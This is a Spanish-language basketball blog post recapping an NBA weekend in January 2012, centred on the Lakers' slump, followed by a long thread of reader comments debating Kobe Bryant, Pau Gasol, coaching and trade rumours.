Informe del fin de semana: Los Lakers pasan por su peor momento

23 de January de 2012 por TheDeerHunter

Volvemos a constatar en qué buenas manos estamos dejando el blog los últimos fines de semana. Éste, además, supuso el debut nocturno de nuestro prometedor rookie melo15. Desconocemos si logró aguantar despierto.

El viernes la atención de nuestros colaboradores se centró en la segunda de las tres derrotas consecutivas de Lakers. En ellas poco se ha podido salvar de los amarillos. Nos asalta la duda si es que hay poco más allá de Kobe o si todo queda limitado a sus manos. Denise nos ofrecía todos los detalles de esta solvente victoria de Orlando (80-92):

“Y sobre el duelo Nelson vs Fisher, los dos lo están haciendo bien. Derek, es junto a Kobe lo único salvable de unos horribles Lakers (Pau & Bynum desaparecidos), y Nelson, pese a estar en muy baja forma, está acertado en el tiro y está haciendo uno de los mejores partidos en lo que va de temporada.”

“Howard (21-23) se ha zampado a Gasol y Bynum, cogiendo mas rebotes él solo que el duo interior (22 rebotes entre ambos). Partidazo del gran Jameer Nelson”

“Y buen juego de J-Rich, Redick, Anderson y sobretodo de Glen Davis, que ha jugado muy poco pero ha metido 4 de sus 5 puntos de forma consecutiva en un momento en que Orlando estaba sufriendo. Ademas ha cogido 8 rebotes, 5 de ellos ofensivos.”

“Por los Lakers, solo Kobe se salva, aunque como ya es habitual en él, ha tenido algunas decisiones que son un insulto al baloncesto colectivo y al juego de equipo.”

Otro de los grandes animadores de los Friday’s night en TJNBA viene siendo Ricky Rubio. El personal vibró con su último tramo en la notable victoria ante Clippers (101-98):

“Empieza el último cuarto en la banca, y sale poco después con 0 puntos, un porrón de tiros fallados y solo 3 rebotes y 3 asistencias. Se mete 6/8 en TL en los minutos más calientes del partido, y termina anotando su único tiro de campo con un triplazo en el momento clave. Y encima defiende de puta madre a Billups en la jugada decisiva. Quedan solo 1.5 segundos, y aparece Love (que estaba haciendo una horrible segunda mitad y no estaba muy fino), para enchufar un triple del copón. Y todo esto aliñado con Milicic cascándose 22 puntos… El mundo al revés. Pero ganaron, ganaron.” RSB

Del viernes queda por destacar la primera victoria foránea de Bucks y tenía que ser en el Madison (100-86); también la de los Suns en Boston con un Gortat dominante (79-71) o la de los Kings en San Antonio (88-86).

El sábado noche la atención giró en torno de los españoles y busky23 nos daba algunos titulares:

“Espectacular partido de Marc que va directo al All-Star,20 pts 11 reb. 5 asist. 6 tap. Enorme segunda parte de los Grizzlies con 4 jugadores superando los 20 pts. Sexto doble-doble de Ricky, 17pts 11 asist. 4 robos. Love ha estado continuamente fuera del partido, 5 de 21 en tiros y “solo” 8 rebotes. Gallinari desatado en el Madison, 37pts 11 reb. D’Antoni sigue con su particular viacrucis, esto ya es serio, igual que en Boston donde ya se está empezando a hablar seriamente de un traspaso que involucre a algún jugador de su Bigthree. Nowitzki hoy no ha jugado ni lo hará en los próximos 3 partidos (Phoenix,Minessota y Utah). El motivo,sus molestias en su rodilla derecha.”

Y 6 años después de los 81 de Kobe, Toronto siguen siendo unas madres.

Finalmente anoche se confirmó el cambio de liderato en la división Pacífico con la victoria de Clippers en Toronto (91-103) y la derrota de Lakers ante Indiana (98-96). Los Bucks confirmaron su dulce momento doblegando a Heat (91-82). Por su parte, Pierce le dio la victoria a Boston ante Wizards (100-94) y Deron coqueteó con el triple-doble en la victoria de Nets ante Bobcats (87-97).

PREMIOS

MVP: La mejor actuación del fin de semana fue la del viernes de Lamarcus Aldridge. 33 puntos y 23 rebotes que destrozaron a los Raptors. Brandon Jennings (36), Danilo Ganillari (37) y Paul Pierce (33) también ha pasado de los 30 puntos estos días a la vez que sus equipos ganaban.

Rookie: Con 17 puntos,  y 11 asistencias, Ricky Rubio volvió a protagonizar el mejor partido de un rookie durante el fin de semana. Iman Shumpert anotó 18 puntos el sábado y Marshon Brooks 20 el domingo. Por su parte, Bismack Biyombo ya siembra el pánico en las zonas: 11 puntos, 7 rebotes y 4 tapones en 18 minutos.

Sorpresa: Al Harrington se fue el viernes hasta los 29 puntos y 7 rebotes mientras que Tiago Splitter encontró minutos el sábado y los aprovechó con 25 puntos (11 de 13) y 10 rebotes. Lo bueno es que el de Denver, al día siguiente, anotó 24 puntos más. Está irreconocible.

Esfuerzo en vano: 2 partidos perdidos con Kobe Bryant anotando o superando 30 puntos. Problemas y de los gordos en Los Angeles.

Comenta

48 comentarios a esta entrada

  1. melo15 dice:
    #1

    Los jugadores, siempre hacen partidazos contra los Knicks, no lo entiendo!!
    Siento discrepar contigo Deer, Kemba se saco 16 puntos 6 rebotes, 4 asistencias, buenos numeros

      Citar

  2. rumbero dice:
    #2

    No he visto el partido de los Lakers, pero me miro el boxscore y los resúmenes y me parece que soy Bill Murray en Atrapado en el tiempo. La chufla que se tira Bryant faltando 5 segundos es tremenda, de las de “soy el dios del clutch”. Precisamente coméntabamos el sábado la gran jugada de pizarra de Adelman para ganar el partido a los Clippers…igualita que la planeada por Brown vaya. En fin, que vale que el banquillo es deplorable, pero hay que involucrar más a Bynum y Gasol y encontrar soluciones que no sea que Kobe haga más de 40 puntos por partido para ganar. Mal asunto sino…

      Citar

  3. TheDeerHunter dice:
    #3

    Pero macho, rumbero… no estarás echando la culpa a Kobe de esa castaña de jugada que le preparan entre Brown y Pau.
    De hecho yo creo que hay que empezar a decirlo. No me parece bien echar balones fuera con lo de que Kobe chupón y todo lo demás. Para empezar a pedir que le den balones a los demás lo primero que deben hacer los demás es enchufarlas… y Pau no es que se esté saliendo precisamente de cara al aro.

      Citar

  4. simon dice:
    #4

    Hombre todos los jugadores se salen contra los Knicks porque son unas madres en defensa… así de simple.
    La verdad es que el debate Bryant Chupón/Bryant Colectivo, al principio he de reconocer que era defensor number one del colectivo, pero poco a poco me he ido acercando al otro lado, y es que como dice Deer si Kobe juega colectivo pero los otros ni las enchufan… pues claro… al final es mejor el modo Chupón, para mi gran culpa de esto lo tienen los nulos sistemas ofensivos de Mike Brown ( esto ya lo sabiamos todos incluso antes de que fichara ) y la apatía de Gasol/Bynum, por Dios vale que tienen pocos balones, pero es que esos balones los juegan sin ninguna energía y como si la cosa no fuera con ellos…
    Esto es como cuando decimos, Nash/Calderón/Ricky/Deron no da mas asistencias porque sus compañeros fallan muchos tiros faciles y son muy malos y no anotan… pues para mi esto es parecido, Kobe tira mucho y es un chupón porque debe pensar para pasarla y que la fallen ellos, la fallo yo…

      Citar

  5. rumbero dice:
    #5

    TheDeerHunter:
    Pero macho, rumbero… no estarás echando la culpa a Kobe de esa castaña de jugada que le preparan entre Brown y Pau.
    De hecho yo creo que hay que empezar a decirlo. No me parece bien echar balones fuera con lo de que Kobe chupón y todo lo demás. Para empezar a pedir que le den balones a los demás lo primero que deben hacer los demás es enchufarlas… y Pau no es que se esté saliendo precisamente de cara al aro.

    Pero si precisamente hago la comparativa con la jugada de los Wolves para decir que si eso es lo mejor que puede preparar Brown estamos apañaos Lo único que he comentado por aqui más de una vez es que no puedes fiarlo todo a Bryant (por muy bien que lo esté haciendo, que yo no digo lo contrario). Y te doy la razón en que para pedirlas hay que enchufarlas, pero las veces que he visto a los Lakers (ahora recuerdo contra Cavaliers y Clippers) me ha dado la sensación que tanto Bynum como Gasol no juegan sueltos, andan con ansiedad por meter las bolas que les llegan. O se empiezan a sentir importantes (más aun Pau después de que lo quisieran enviar a Houston con un lazito) o mala pinta tiene, solo digo eso, y probablemente sea más culpa de Brown que de Bryant

      Citar

  6. GreenPride dice:
    #6

    El tema estrella del día parece ser el mal momento que pasan los Lakers (que decir entonces de Celtics o Knicks). Yo creo que la cosa es más o menos fácil de explicar. Brown es un entrenador que ha demostrado hacer defender a sus equipos y ser muy limitado en hacerles atacar con coherencia (siempre ha tenido una super-estrella que se lo ha solucionado). Esto ya se vio en los Cavs y se acentúa en los Lakers pues Kobe es menos pasador que LeBron. Esto condena al juego de los Lakers a dar pocos balones a los 2 interiores (Pau y Bynum) que son su gran ventaja sobre el resto de equipos que se puedan cruzar. Desde mi punto de vista los Lakers deberían jugar más de dentro hacia afuera y empezar la mayoría de sus ataques con balón a uno de los pivots para crear ventajas de los 2 para 1 que les tendrían que hacer pero si no lo hacen y dada la poca calidad de los demás se atascan y como en defensa tampoco es que sean perros de presa (equipo ya mayor y jugadores no en la élite de los defensores) pues llegan a que o Kobe hace 40 y tantos o no le ganan a nadie. Yo sigo diciendo que tienen mimbres para dar guerra (creo que no para ganar el anillo) pero que deberían cambiar su forma de ataque para hacer algo más.
    En cuanto al resto, las cosas siguen bastante igualadas.
    De momento gran momento de Pacers, Grizzlies (temporadón de Marc), Sixers, Nuggets y Jazz y decepcionantes equipos como Celtics, Knicks o Lakers.
    Por cierto, gran temporada de Ricky hasta el momento

      Citar

  7. melo15 dice:
    #7

    bueno he de reconocer, que los Knicks, lo estan haciendo muy mal, pero con la llegada de Davis, yo creo que se solucionaran muchos problemas, y si no D’antoni fuera, seguro que hay mejores entrenadores.

      Citar

  8. MagicJohnson32 dice:
    #8

    Yo sólo os recuerdo (o informo, para quien no lo sepa) que el entrenador asistente de Mike Brown especialista en ataque es John Kuester. ¿Elaboro más la idea o se capta?

    Por cierto, Deer, recuerdo la cara que se te quedó cuando te lo dije este verano. Te quedaste blanco, macho xDD

      Citar

  9. wind_bird dice:
    #9

    este también ideaba jugadas para los Sixers… cuando Iverson no?

      Citar

  10. melo15 dice:
    #10

    Quien es el Kuester este?

      Citar

  11. HisRoyalAirness dice:
    #11

    El tema de Lakers es tan sencillo como se decía por ahí arriba. Sí, Kobe es un superclase y lo que sea pero los Lakers han estado estos años ahí arriba siempre porque NADIE podía defender su juego interior. Es lo que los diferencia de los demás y donde crean una verdadera superioridad. Las posesiones que se están jugando Bynum y Gasol son lamentables, siempre recibiendo en mala posición y con pocos segundos en el reloj. Esto sucede cuando Kobe decide soltarla y, por supuesto, el equipo no les facilita un entorno favorable para anotar. Ayer a Pau le soltaron varias bolas en el lateral de la zona y le hacían continuamente dobles marcajes porque los burros de Barnes y Fisher no se abrían para sacarles al defensor.
    Ah, y por no comentar varias jugadas de Artest botándola desde el medio del campo (con un estilo propio de Isaiah Thomas, por lo menos) y tirándose fade-aways con dos jugadores encima.
    Estoy casi convencido de que dan la temporada por perdida y Kobe lo que quiere es sacar otro MVP

      Citar

  12. HisRoyalAirness dice:
    #12

    Y Deer, no es por llevarte la contraria pero que el base titular de Los Ángeles Lakers juegue 30 minutazos y su producción sea de 4 puntos, 3 rebotes defensivos y 2 asistencias es para hacérselo mirar…

      Citar

  13. MagicJohnson32 dice:
    #13

    melo15:
    Quien es el Kuester este?

    Melo, en estas “reflexiones” del año pasado hablamos sobre la labor de Kuester en los Pistons: http://blog.tjnba.com/2011/04/01/reflexiones-sobre-la-bocina-5/

      Citar

  14. busky23 dice:
    #14

    Lo que está pasando en L.A no hace sino constatar lo que veníamos comentando aquí desde el momento en que aparece por el banquillo Laker un tal Mike Brown,si ha eso le sumamos que David Corleone Stern desbarata la jugada preparada por Kupchak de traerse a CP3 y Howard el panorama que queda en el equipo es desolador.
    Fichajes de medio pelo,Odom abandonando la nave rebotado,Gasol con el puñal en la espalda,Artest cada vez peor,Fisher rebentado a minutos…resultado: 1 mes de competición y decimos,si si, DECIMOS en el Oeste y eso q han tenido un calendario bastante decente.
    No dudo q habrá cambios,una franquicia como Lakers no puede permitirse el lujo de acabar la temporada fuera de Playoffs. Quien saldrá? Si damos por hecho que salvo que el no quiera Kobe acabará su carrera de amarillo,que Bynum tiene potencial y los pivots grandes,fuertes y con calidad están en extinción y que con el resto no engañas a nadie a no ser que los metas de relleno,solo les queda la carta de Gasol por el que podrían conseguir 2 o 3 jugadores interesantes y de paso le hacen un favor al bueno de Pau.
    Otro día hablamos de los Celtics,que también tiene miga el asunto,me encantó la reacción de ayer de Pierce a los rumores de su posible traspaso…que falta de respeto…
    Del Atlético de Madrid de la NBA(los Knicks),mejor lo dejamos

      Citar

  15. TheDeerHunter dice:
    #15

    HisRoyalAirness:
    Y Deer, no es por llevarte la contraria pero que el base titular de Los Ángeles Lakers juegue 30 minutazos y su producción sea de 4 puntos, 3 rebotes defensivos y 2 asistencias es para hacérselo mirar…

    Te diría que llevas razón si es que Fisher tuviera una autonomía de la ostia, libertad para expresar su creatividad baloncestística… como es que es “ni de coña” y al lado de un tío que ahora mismo está absorviendo tanto juego (y tantas labores ajenas) habrá que valorar más sus errores, que suelen ser pocos que esa producción que tu señalas como escasa. Él, Horry y algunos otros jugadores que han marcado épocas en esta franquicia jamás fueron de inmensa productividad estadística en temporada regular (y casi en ningún momento) Aquí me lleno la boca hasta de nombres muy brutos como Worthy, Coop, Scot… gente para ganar anillos.

    El otro día me lanzabas algún otro comentario… pero es que yo jamás he dicho que Fisher tenga que ser el titular. Ójala hubiera habido alguien en Lakers en estos últimos 15 años que hubiera tenido las santas narices de hacer sentarle haciéndolo mejor que él, aunque sólo sea para 5 o 10 minutillos menos. Hasta que ese momento llegue (igual lo vemos cuando él tenga 50 o 60 años) es lo que hay y no es poco, porque por mucho que todo el mundo le señale él no es ni remotamente el principal problema de estos Lakers. Con una producción a lo sumo sutilmente superior a la de este año es un jugador que ha marcado una época en la franquicia y pasarán muchos años antes de que alguien consiga sustituirle dignamente.

      Citar

  16. TheDeerHunter dice:
    #16

    MagicJohnson32:

    Por cierto, Deer, recuerdo la cara que se te quedó cuando te lo dije este verano. Te quedaste blanco, macho xDD

    Más que blanco creía que me estábais tomando el pelo Gallis y tú.
    Uno de los mayores idiotas integrales que hallamos visto sentarse en un banquillo en los últimos tiempos, con todo el pasteo que nos pegamos el año pasado con él y va y lo fichan para el equipo técnico.
    A veces la realidad supera a la ficción. A quien se le ocurrió habría que darle un premio…

      Citar

  17. HisRoyalAirness dice:
    #17

    TheDeerHunter: Te diría que llevas razón si es que Fisher tuviera una autonomía de la ostia, libertad para expresar su creatividad baloncestística… como es que es “ni de coña” y al lado de un tío que ahora mismo está absorviendo tanto juego (y tantas labores ajenas) habrá que valorar más sus errores, que suelen ser pocos que esa producción que tu señalas como escasa. Él, Horry y algunos otros jugadores que han marcado épocas en esta franquicia jamás fueron de inmensa productividad estadística en temporada regular (y casi en ningún momento) Aquí me lleno la boca hasta de nombres muy brutos como Worthy, Coop, Scot… gente para ganar anillos.

    El otro día me lanzabas algún otro comentario… pero es que yo jamás he dicho que Fisher tenga que ser el titular. Ójala hubiera habido alguien en Lakers en estos últimos 15 años que hubiera tenido las santas narices de hacer sentarle haciéndolo mejor que él, aunque sólo sea para 5 o 10 minutillos menos. Hasta que ese momento llegue (igual lo vemos cuando él tenga 50 o 60 años) es lo que hay y no es poco, porque por mucho que todo el mundo le señale él no es ni remotamente el principal problema de estos Lakers. Con una producción a lo sumo sutilmente superior a la de este año es un jugador que ha marcado una época en la franquicia y pasarán muchos años antes de que alguien consiga sustituirle dignamente.

    Bueno, yo creo que no te he lanzado ningún comentario, me parece que te equivocas de persona porque creo que nunca he escondido mi opinión sobre Fisher. Pero vamos, si fuese el caso creo que ha sido de buen rollo.

    Ya sé que tú no has dicho que debe ser titular pero creo que antes era lo de que en el triángulo el base era un mero adorno y ahora es que no comete errores. Yo no voy sólo a Fisher, le estoy dando a todos, incluso a gente a la que admiro como Pau y Kobe.
    No creo que todo se reduzca a NO RESTAR en un equipo, hay que aportar algo y sumar. Me vale como jugador de equipo, sé que es un líder en el vestuario y yo jamás lo dejaría marchar de la organización pero creo que si se critica a los Lakers todos tienen parte de culpa

      Citar

  18. TheDeerHunter dice:
    #18

    Por supuesto que era de buen rollo, HisRoyal… en absoluto insinuaba lo contrario, hombre. Concretamente era éste: “Deer yo soy bastante de Lakers y creo que Fisher es un lastre. No vale meter 2 triples decisivos al año y merecer la titularidad por eso”
    Sólo te respondía específicamente a ese comentario al respecto de eso de la titularidad, pero me parecía absurdo hacerlo en el post del otro día, por antiguo…

    No es que antes fuera el triángulo y ahora quéseyo. Valoro a Fisher más allá de una producción simplemente estadística y la razón es que él es y ha sido siempre un simple currante en el equipo. Un currante con una habilidad mítica para matar partidos importantes, claro…
    No creo que, por mucho que haya cambiado el sistema, nadie deba esperar de él que se convierta por arte de magia en una de las espadas. Tampoco sería justo.
    Y me parece perfecto eso de echar las culpas a todos en su justa medida. Pero antes de las culpas a Fisher vienen unas cuantas.

      Citar

  19. HisRoyalAirness dice:
    #19

    TheDeerHunter:
    Por supuesto que era de buen rollo, HisRoyal… en absoluto insinuaba lo contrario, hombre. Concretamente era éste: “Deer yo soy bastante de Lakers y creo que Fisher es un lastre. No vale meter 2 triples decisivos al año y merecer la titularidad por eso”
    Sólo te respondía específicamente a ese comentario al respecto de eso de la titularidad, pero me parecía absurdo hacerlo en el post del otro día, por antiguo…

    No es que antes fuera el triángulo y ahora quéseyo. Valoro a Fisher más allá de una producción simplemente estadística y la razón es que él es y ha sido siempre un simple currante en el equipo. Un currante con una habilidad mítica para matar partidos importantes, claro…
    No creo que, por mucho que haya cambiado el sistema, nadie deba esperar de él que se convierta por arte de magia en una de las espadas. Tampoco sería justo.
    Y me parece perfecto eso de echar las culpas a todos en su justa medida. Pero antes de las culpas a Fisher vienen unas cuantas.

    Sí, la verdad es que he vuelto a leer tu comentario de antes y no sé por qué pensé que te lo habías tomado a mal…es lunes, no me lo tengas en cuenta jeje

    Es cierto, ese comentario lo hice pero no haciendo referencia a que tú pedías la titularidad. Yo sé que valoras el trabajo de Fisher, ya el año pasado tuvimos un par de conversaciones sobre el tema y, sinceramente, entiendo perfectamento tu punto y en gran medida lo comparto. Lo que me sangra del asunto, de la prensa y del aficcionado medio es que se está haciendo una sangre y un ninguneo con Gasol que está sobrepasando todo límite.
    Sé que ultimamente con lo de Ricky y eso parece que soy un super-español cegado por la rojigualda pero nada más lejos de la realidad. Lo que pasa es que la evidencia ultimamente es escalofriante. Incluso en los medios potentes, no sólo en la prensa angelina, Gasol es el culpable total y absoluto del descalabro institucional de los amarillos. Desde el inicio de temporada se debate sobre los mejores power forwards de la liga y nadie jamá smenciona a Pau, sí a Nowitzki pese a estar haciendo su peor temporada de lejos (y para mí es de los mejores, cuidado, sólo pido el mismo rasero para todos).
    Con todo este rollo lo que intento decir es que a Kobe nadie le echa la culpa, de Bynum (como está de titular para el All-Star) tampoco, de Artest y su culo gordo tampoco y de Fisher tampoco.
    Todo se achaca al traspaso vetado y no a la planificación que se está haciendo. Y con la planificación incluyo a que Fisher sea el base titular cuando ya no da la talla, no es su culpa eso está claro, pero la sangría de los Mavs en PO vino desde el perímetro en forma de triples. Y digo Fisher como digo cualquiera de los jugadores, empezano por Pau que tampoco está cumpliendo acorde con lo que cobra.
    Cuando se daran cuenta? Cuando traspasen a Gasol y, aún así, no pasen de segunda ronda.

      Citar

  20. nba dice:
    #20

    Yo creo que, un gran porcentaje los problemas actuales, están causados por el bajisimo rendimiento de Pau.No olvidemos los pasados playoffs contra Hornets y Mavericks, cuya actuacion fue bochornosa y en la que estaba P.Jackson.Eso no quita para que al actual entrenador también se le responabilice, ya que se supone que tiene que potenciar las virtudes y esconder los defectos. Y teniendo 2 7ft en la pintura, los ataques deberían ser más productivos y faciles.
    Por lo que o todo el equipo se pone las pilas o se quedan fuera de playoffs

      Citar

  21. MagicJohnson32 dice:
    #21

    No comparto opinión, Airness. En la prensa americana se discute si Kobe está tirando demasiado, se ha dejado claro que la plantilla es muy corta y que no tiene una identidad ofensiva (ver la columna de Wojnarowski al día siguiente de la derrota en Miami), que los Lakers no están aprovechando la superioridad interior, que regalaron de manera absurda a Odom… Vamos, que le están cayendo palos a todos, y no creo que Pau esté ni el primero, ni el segundo en la lista de culpables que maneja los medios. De hecho, creo que el traspaso frustrado le está valiendo de coartada en un flojo inicio de temporada, en el que a ratos le falta energía y a ratos, acierto.

      Citar

  22. Denise dice:
    #22

    busky23:
    Lo que está pasando en L.A no hace sino constatar lo que veníamos comentando aquí desde el momento en que aparece por el banquillo Laker un tal Mike Brown,si ha eso le sumamos que David Corleone Stern desbarata la jugada preparada por Kupchak de traerse a CP3 y Howard el panorama que queda en el equipo es desolador.

    No quiero ser cansino en este tema, pero por favor, ¿de verdad creeis que el traspaso vetado hubiese mejorado la situación de Lakers?? Y tios…no metais a Howard en el saco que lo de Paul estaba hecho, pero lo de Howard no, y dudo mucho que los Magic lo hubieran traspasado a pelo por Bynum.

    Que alguien levante la mano y me jure por la Quinta Enmienda si unos Lakers con Paul y una pintura con McRoberts-Bynum-Murphy y alguna mediania que hubieran pillado por ahí hubiera sido mejor que el actual…

    Es algo que no se puede saber, pero yo creo que no.

    y Mike Brown tendrá su parte de culpa, Kobe también, Pau y Bynum también, Metta, Fisher y el resto también, pero el principal culpable es el GM que con su avaricia por poseer 2-3 estrellitas despedazó a un equipazo, con los fácil que hubiera sido manetener todo el bloque del año pasado + Murphy (por Ratliff) y fichar con la mid level a Jose Juan Barea.
    Si esto hubiera sucedido, los Lakers hubieran vuelto a ser favoritos nº1 por cuarto año consecutivo.

      Citar

  23. Denise dice:
    #23

    Y cuidado con Biyombo, que no esperaba que explotase tan pronto y los Bobcats ya están amortizando su pick 5

    Lo de los Knicks era una historia que se sabía, me anoto el tanto en mi casillero ya que llevo diciendo desde el trade Denver-Knicks que los neoyorquinos salieron perdiendo.
    Carmelo Anthony no es un digno jugador franquicia para un equipo ganador ni Amare un escudero.

      Citar

  24. HisRoyalAirness dice:
    #24

    MagicJohnson32:
    No comparto opinión, Airness. En la prensa americana se discute si Kobe está tirando demasiado, se ha dejado claro que la plantilla es muy corta y que no tiene una identidad ofensiva (ver la columna de Wojnarowski al día siguiente de la derrota en Miami), que los Lakers no están aprovechando la superioridad interior, que regalaron de manera absurda a Odom… Vamos, que le están cayendo palos a todos, y no creo que Pau esté ni el primero, ni el segundo en la lista de culpables que maneja los medios. De hecho, creo que el traspaso frustrado le está valiendo de coartada en un flojo inicio de temporada, en el que a ratos le falta energía y a ratos, acierto.

    Creo que no me he explicado bien o he sido demasiado categórico. Las columnas de opinión que he leído y por programas que he visto achacaban la culpa al bajo rendimiento de Pau, sobre todo cuando Kobe tuvo los partidos de +40. Es cierto que mucha otra gente, gente que controla bastante, por otra parte como Chris Sheridan hablan de que alejando a Pau de la pintura se limita su zona de influencia y los Lakers pierden potencial. Es cierto que no se le da a Pau, exclusivamente, sobre todo en las derrotas, pero en las victorias (que en mi opinión tambieén han sido conseguidas con un baloncesto mediocre) sí, quizás demasiado.
    Y como me lío hablando y al final no se sabe lo que opino ahí va: para mí la culpa es de Mike Brown. Que un entrenador permita que Pau Gasol tire 3 tiros más que Artest por partido es un inútil. Que Kobe se tire una media de 27 y lleven el record que llevan es para replanteárselo. El segundo culpable? El mismo Kobe, por seguir con su Kobe-System y tirando entre 2 y 3 tíos.

      Citar

  25. HisRoyalAirness dice:
    #25

    Y de Wojnarowski mejor no hablo porque me parece un veleta terrible…

      Citar

  26. The wolf dice:
    #26

    Gasol jugador de la semana en el Oeste

      Citar

  27. Esteban dice:
    #27

    Los lakers deben cambiar a gasol YA, aun mantiene su precio y su contrato no parece malo, de seguir asi, cada vez sera mas dificil cambiarlo y dudoi q el mejore, su etapa en lakers esta terminada

    Digo, gasol mas la excepcion por granger y west…

    Me gusta para ambos lados

      Citar

  28. RSB dice:
    #28

    Pau debe salir ya de los Lakers. Estoy muy decepcionado con él, y no es por su rendimiento (que a mí no me parece tan alarmante), sino por su sumisión. Pensaba que era un ganador con carácter, no un sumiso que depende de los Lakers hasta el punto aguantar que se le humille así. Ya no vas a ganar más anillos (por lo menos de angelino), pues ten orgullo joder y vete donde sea, aunque sea en un equipo de zona media-baja, es mejor terminar tus años disfrutando un poco de este deporte que convertirse en el injusto cabeza de turco de una franquicia víctima de la desidia.

    A mí personalmente no me extraña que los Lakers anden ahora fuera de PO, no sé dónde está la alarma. El equipo simplemente no da para más. Desde el robo de Pau, su GM se ha tocado los huevos a dos manos, dejando que se avivaran año tras año las carencias de la plantilla, con pequeños parches y remiendos (se llegó a 3 finales y el éxito no hizo que se moviera el culo ante las necesidades del roster que iban camino de empeorar cada vez más), hasta que la cosa ha terminado por explotar. Vergonzoso que a estas alturas se siga sin un base medianamente decente, tantos años reclamándolo. Blake fue una broma de mal gusto, ha hecho bueno a Farmar. El cambio Ariza -Artest fue otro cachondeo que resistió solo un año… Ningún joven te ha salido bien, y para colmo regalas a un jugador del nivel de Odom. ¿A qué cojones se han dedicado estos últimos 4 años? Margen salarial no hay, pero es que tampoco se podía hacer peor. Y el contrato a Pau se lo pusieron ellos delante, tanto que ahora se quejan.

    Que lo corten si tan cancerígeno es

      Citar

  29. kantonyo dice:
    #29

    The wolf:
    Gasol jugador de la semana en el Oeste

    Ya lo dije yo ayer…. era lógico sus estadísticas y el pleno de victorias de Memphis… y vuelvo a decir que como siga a este ritmo creo que se puede llevar el premio del jugador del mes…

      Citar

  30. HisRoyalAirness dice:
    #30

    RSB:
    Pau debe salir ya de los Lakers. Estoy muy decepcionado con él, y no es por su rendimiento (que a mí no me parece tan alarmante), sino por su sumisión. Pensaba que era un ganador con carácter, no un sumiso que depende de los Lakers hasta el punto aguantar que se le humille así. Ya no vas a ganar más anillos (por lo menos de angelino), pues ten orgullo joder y vete donde sea, aunque sea en un equipo de zona media-baja, es mejor terminar tus años disfrutando un poco de este deporte que convertirse en el injusto cabeza de turco de una franquicia víctima de la desidia.

    A mí personalmente no me extraña que los Lakers anden ahora fuera de PO, no sé dónde está la alarma. El equipo simplemente no da para más. Desde el robo de Pau, su GM se ha tocado los huevos a dos manos, dejando que se avivaran año tras año las carencias de la plantilla, con pequeños parches y remiendos (se llegó a 3 finales y el éxito no hizo que se moviera el culo ante las necesidades del roster que iban camino de empeorar cada vez más), hasta que la cosa ha terminado por explotar. Vergonzoso que a estas alturas se siga sin un base medianamente decente, tantos años reclamándolo. Blake fue una broma de mal gusto, ha hecho bueno a Farmar. El cambio Ariza -Artest fue otro cachondeo que resistió solo un año… Ningún joven te ha salido bien, y para colmo regalas a un jugador del nivel de Odom. ¿A qué cojones se han dedicado estos últimos 4 años? Margen salarial no hay, pero es que tampoco se podía hacer peor. Y el contrato a Pau se lo pusieron ellos delante, tanto que ahora se quejan.

    Que lo corten si tan cancerígeno es

    Estoy bastante de acuerdo con lo que dices. Creo que Pau está asumiendo todo lo que le cae para ser un buen profesional. Creo que hace mal porque parece que está reconociendo algún tipo de “culpabilidad”.
    Ojalá algún equipo potente pujase por él. Se había hablado de Bulls pero el problema es que su traspaso encarece su contrato.
    Si no le quieren o no le encuentran utilidad que le amnistien, ya verian como literalmente TODO DIOS se partía la boca por él.

    Por cierto, qué es esa columpiada de Orlando de pedir a Chandler y Stoudamire por Howard? No lo digo porque no lo valga sino porque Stat cobra el máximo y la cuentas no salen

      Citar

  31. Nacho dice:
    #31

    Lo de Lakers se veía venir con el PEAZO entrenador que tienen, encima asesorado por el ínclito Messina (que parece imitar la trayectoria de Javier Sardá, icono mediático que termina devorado por las propias ondas)
    No se si allí tendrán remedio.
    Que tradeen a Pau y Kobe por Deron, López y morrallas varias que tengan por allí (no controlo mucho de los Nets) para equilibrar salarios y a los próximos Brooklin’s Boys (si su compatriota paga por AK47) les queda un quinteto apañado. Más que nada porque estoy harto de levantarme a las 4:30 para tragarme las bazofias que dan por LA.
    Así los angelinos sueñan con Deron, Bynum y Howard en verano, y si juegan bien los puedo ver el año que viene.
    De momento me quedo con los Wolves, son divertidos, aunque les falta un no sé qué para enganchar. Tienen frescura, si no juega Beasley más, pero no doy con lo que le falta. Por cierto, artículo de Paul Shirley interesante:
    http://www.elpais.com/articulo/deportes/justa/soseria/Rick/Adelman/elpepudep/20120123elpepidep_23/Tes

      Citar

  32. simon dice:
    #32

    HisRoyalAirness:

    Por cierto, qué es esa columpiada de Orlando de pedir a Chandler y Stoudamire por Howard? No lo digo porque no lo valga sino porque Stat cobra el máximo y la cuentas no salen

    Es que con Howard va Turkoglu, lo que igualaría los salarios, pues turkoglu creo k cobra sobre los 11-12 y Chandler si no me equivoco firmo por unos 12 o asi. los salarios si cuadrarian.

      Citar

  33. HisRoyalAirness dice:
    #33

    simon: Es que con Howard va Turkoglu, lo que igualaría los salarios, pues turkoglu creo k cobra sobre los 11-12 y Chandler si no me equivoco firmo por unos 12 o asi. los salarios si cuadrarian.

    Joder, vaya papelón…

      Citar

  34. MagicJohnson32 dice:
    #34

    Melo ¿es tu cumpleaños?

      Citar

  35. melo15 dice:
    #35

    Tios, soñar es gratis, dejadme disfrutar de mi imaginacion, aunque en la play, hize este trade, y me iba mejor jugar con Stat, que tiene un tirito de media distancia que no veas, en cambio Howard, no la mete ni estando solo.
    Aunque en la realidad…

      Citar

  36. HisRoyalAirness dice:
    #36

    melo15:
    Tios, soñar es gratis, dejadme disfrutar de mi imaginacion, aunque en la play, hize este trade, y me iba mejor jugar con Stat, que tiene un tirito de media distancia que no veas, en cambio Howard, no la mete ni estando solo.
    Aunque en la realidad…

    jajaja la play…

    aún recuerdo el pro evolution 4 en el que Recoba y Verón eran los mejores jugadores del mundo DE LEJOS. La ficción pasándose por el forro a la realidad

      Citar

  37. Jose Luis dice:
    #37

    @Magic a qué viene lo del cumpleaños de melo15? XD

    @melo15 es tu cumpleaños? echa un vistazo a tu equipo de la hoops hombre! 🙂

      Citar

  38. Pop dice:
    #38

    Curioso el dato que acaban de dar en el partido de Minnesota. Si Rubio ganara este año el ROY sería el tercer miembro de su Draft en ganarlo.

      Citar

  39. HisRoyalAirness dice:
    #39

    Y que Ricky es el segundo jugador que más faltas en ataque provoca en la liga… Si sigue así y sigue con los robos aùn va a entrar en el quinteto defensivo.

    Minnesota hoy pecò de falta de experiencia y los veteranos de falta de calidad, salvo Ridnour. Tienen que hacer un par de movimientos sin tardar demasiado.
    Love superlativo

      Citar

  40. Sancho88 dice:
    #40

